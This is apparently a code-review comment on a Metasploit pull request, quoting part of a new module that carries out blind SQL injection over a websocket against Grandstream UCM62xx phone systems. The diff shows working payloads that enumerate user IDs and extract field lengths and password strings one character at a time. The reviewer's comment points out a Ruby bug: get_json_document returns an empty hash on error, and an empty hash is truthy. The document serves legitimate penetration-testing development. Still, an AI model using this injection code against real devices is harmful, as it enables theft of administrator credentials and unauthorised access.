modules/auxiliary/scanner/http/grandstream_ucm62xx_sql_account_guess.rb

```diff
@@ -0,0 +1,219 @@
+      fail_with(Failure::UnexpectedReply, 'Failed to parse the returned JSON response. ')
+    end
+
+    status = res_json.dig('message', 'status')
+    return 1 if status.nil?
+
+    status
+  end
+
+  # Guess valid user ids in the database. These are sequential (0, 1, 2, etc) with the default
+  # admin user starting at 0. Return an array of valid ids.
+  def guess_user_ids
+    return_array = Array.new
+
+    datastore['ID_SCAN'].times do |n|
+      wsock = connect_ws(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, '/websockify')
+      )
+
+      wsock.put_wstext(create_injection_request("' OR user_id=#{n}--"))
+      next unless recv_wsframe(wsock) == 0
+
+      return_array << n
+    end
+
+    return_array
+  end
+
+  # A generic injection to guess a fields length. This assumes the field won't be longer
+  # than 64 characters. Which is probably a safe bet.
+  def guess_field_length(id, field)
+    64.times do |n|
+      wsock = connect_ws(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, '/websockify')
+      )
+
+      wsock.put_wstext(create_injection_request("\' OR user_id=#{id} AND LENGTH(#{field})=#{n}--"))
+      next unless recv_wsframe(wsock) == 0
+
+      return n
+    end
+
+    return 0
+  end
+
+  # A generic injection to guess a string field. This implementation guesses all printable
+  # characters (which is inline with allowed password values). It excludes \ since, while
+  # the user can technically use it in a password, you can't actually log in if the character
+  # is present. Returns the guessed value
+  def guess_string(id, field, length)
+    string = ''
+    length.times do |n|
+      for printable in 0x20...0x7e
+
+        next unless printable != 0x5c
+
+        char = printable.chr
+
+        wsock = connect_ws(
+          'method' => 'GET',
+          'uri' => normalize_uri(target_uri.path, '/websockify')
+        )
+        temp_string = string + char
+
+        wsock.put_wstext(create_injection_request("\' OR user_id=#{id} AND substr(#{field},1,#{temp_string.length})='#{temp_string}'--"))
+        next unless recv_wsframe(wsock) == 0
+
+        string.concat(char)
+        return string if string.length == length
+
+        break
+      end
+
+      # if string.length != n+1 then we failed to guess a character
+      return '' unless string.length == (n + 1)
+    end
+
+    ''
+  end
+
+  # Extract the version from the cgi endpoint and return true if the
+  # reported version is affected by the vulnerability.
+  def check_version
+    normalized_uri = normalize_uri(target_uri.path, '/cgi')
+    print_status("Requesting version information from #{normalized_uri}")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalized_uri,
+      'vars_post' => { 'action' => 'getInfo' }
+    })
+
+    return false unless res&.code == 200
+
+    body_json = res.get_json_document
+    return false unless body_json
```

Comment:
As per https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/lib/rex/proto/http/response.rb#L124 the return value of `get_json_document` if there is an error is `{}` which in Ruby is still considered as a Truthy object:

```
 ~/git/metasploit-framework │ master ?9  irb                             7 х │ 3.0.2 Ruby 
3.0.2 :001 > unless {}
3.0.2 :002 >   print "A"
3.0.2 :003 > end
 => nil 
3.0.2 :004 > return a
(irb):4:in `<main>': undefined local variable or method `a' for main:Object (NameError)
	from /home/gwillcox/.rvm/gems/ruby-3.0.2@metasploit-framework/gems/irb-1.3.6/exe/irb:11:in `<top (required)>'
	from /home/gwillcox/.rvm/gems/ruby-3.0.2@metasploit-framework/bin/irb:23:in `load'
	from /home/gwillcox/.rvm/gems/ruby-3.0.2@metasploit-framework/bin/irb:23:in `<main>'
	from /home/gwillcox/.rvm/gems/ruby-3.0.2@metasploit-framework/bin/ruby_executable_hooks:22:in `eval'
	from /home/gwillcox/.rvm/gems/ruby-3.0.2@metasploit-framework/bin/ruby_executable_hooks:22:in `<main>'
3.0.2 :005 > return a unless {}
 => nil 
3.0.2 :006 >
```

Therefore this statement should really be updated as it does not correctly check the result of `get_json_document`.